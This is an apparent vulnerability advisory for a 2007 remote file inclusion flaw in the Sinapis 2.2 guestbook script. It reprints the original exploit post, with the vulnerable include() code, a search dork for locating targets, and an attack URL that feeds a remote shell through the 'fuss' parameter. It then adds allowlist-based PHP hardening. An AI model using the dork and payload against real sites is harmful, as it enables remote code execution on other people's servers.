Vendor: Sinapis Gästebuch
By: kezzap66345
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion (RFI)
Product Name: Sinapis Gästebuch
Affected Version From: Sinapis 2.2
Affected Version To: Sinapis 2.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Sinapis 2.2 Gastebuch

The Sinapis 2.2 Gastebuch script is vulnerable to a Remote File Inclusion (RFI) attack: sinagb.php passes the fuss parameter to include() after checking only that it is not empty. This allows an attacker to include a remote file hosted on a malicious server, which can lead to remote code execution or other malicious activities.

Mitigation:

The vulnerability can be mitigated by validating and sanitizing the fuss request parameter before it is passed to include(). It is recommended to update to the latest version of the script that includes security patches.
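
One way to apply that validation to the include($fuss) block shown in the raw data below, as an added example that is not code from the Sinapis script or its author. The footers/ directory, the allowlist keys and the file names are hypothetical, and reading the value from $_GET is an assumption about how the parameter reaches the script.

```php
<?php
// Added example: hardened replacement for the include($fuss) block in sinagb.php.
// Assumptions (not from the original script): footers live in a local
// "footers/" directory and the keys and file names below are hypothetical.

// Allowlist: request value => file on disk. Nothing taken from the
// request is ever used as part of a path.
const FOOTERS = [
    'default' => 'footer_default.php',
    'minimal' => 'footer_minimal.php',
];

/**
 * Return the absolute path of the footer to include, or null when no
 * footer was requested or the value is not on the allowlist.
 */
function resolve_footer(?string $requested, string $baseDir): ?string
{
    if ($requested === null || $requested === '') {
        return null;
    }
    if (!array_key_exists($requested, FOOTERS)) {
        // Log rejected values (encoded and truncated) for later review.
        error_log('sinagb: rejected fuss value: ' . substr(rawurlencode($requested), 0, 120));
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . FOOTERS[$requested]);
    // Defence in depth: the file must exist and resolve inside $baseDir.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Read the parameter explicitly rather than through a global variable.
$fuss = isset($_GET['fuss']) && is_string($_GET['fuss']) ? $_GET['fuss'] : null;
$footer = resolve_footer($fuss, __DIR__ . '/footers');

if ($footer === null) {
    echo "</body></html>";   // same fallback as the original empty-$fuss branch
} else {
    include $footer;
}
```

Setting allow_url_include = Off in php.ini (the default since PHP 5.2) adds a second layer against remote URLs in include(), but it does not stop inclusion of local files, so the allowlist is still needed.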
Source

Exploit-DB raw data:

Sinapis 2.2 Gastebuch

*****************
Found by kezzap66345 *
*****************
Script:
http://www.scripter.ch/start.php?id=41.18.9&pos=gb&title=Sinapis%20Gästebuch%20<img%20src=/pics/gbscr.gif>
*****************
Dork="inurl:sinagb.php"
*****************
ERROR:

if($fuss == ""){
echo "</body></html>";}
else{
include($fuss);}       <<< rfi coded


**************************************************************************************
RFI:

http://SITE.com/path//sinagb.php?fuss=[SHELL]


**************************************************************************************
kezzap66345[at]hotmail[dot]com

******thanx=x0r0n*str0ke*shika********************************************************

# milw0rm.com [2007-02-23]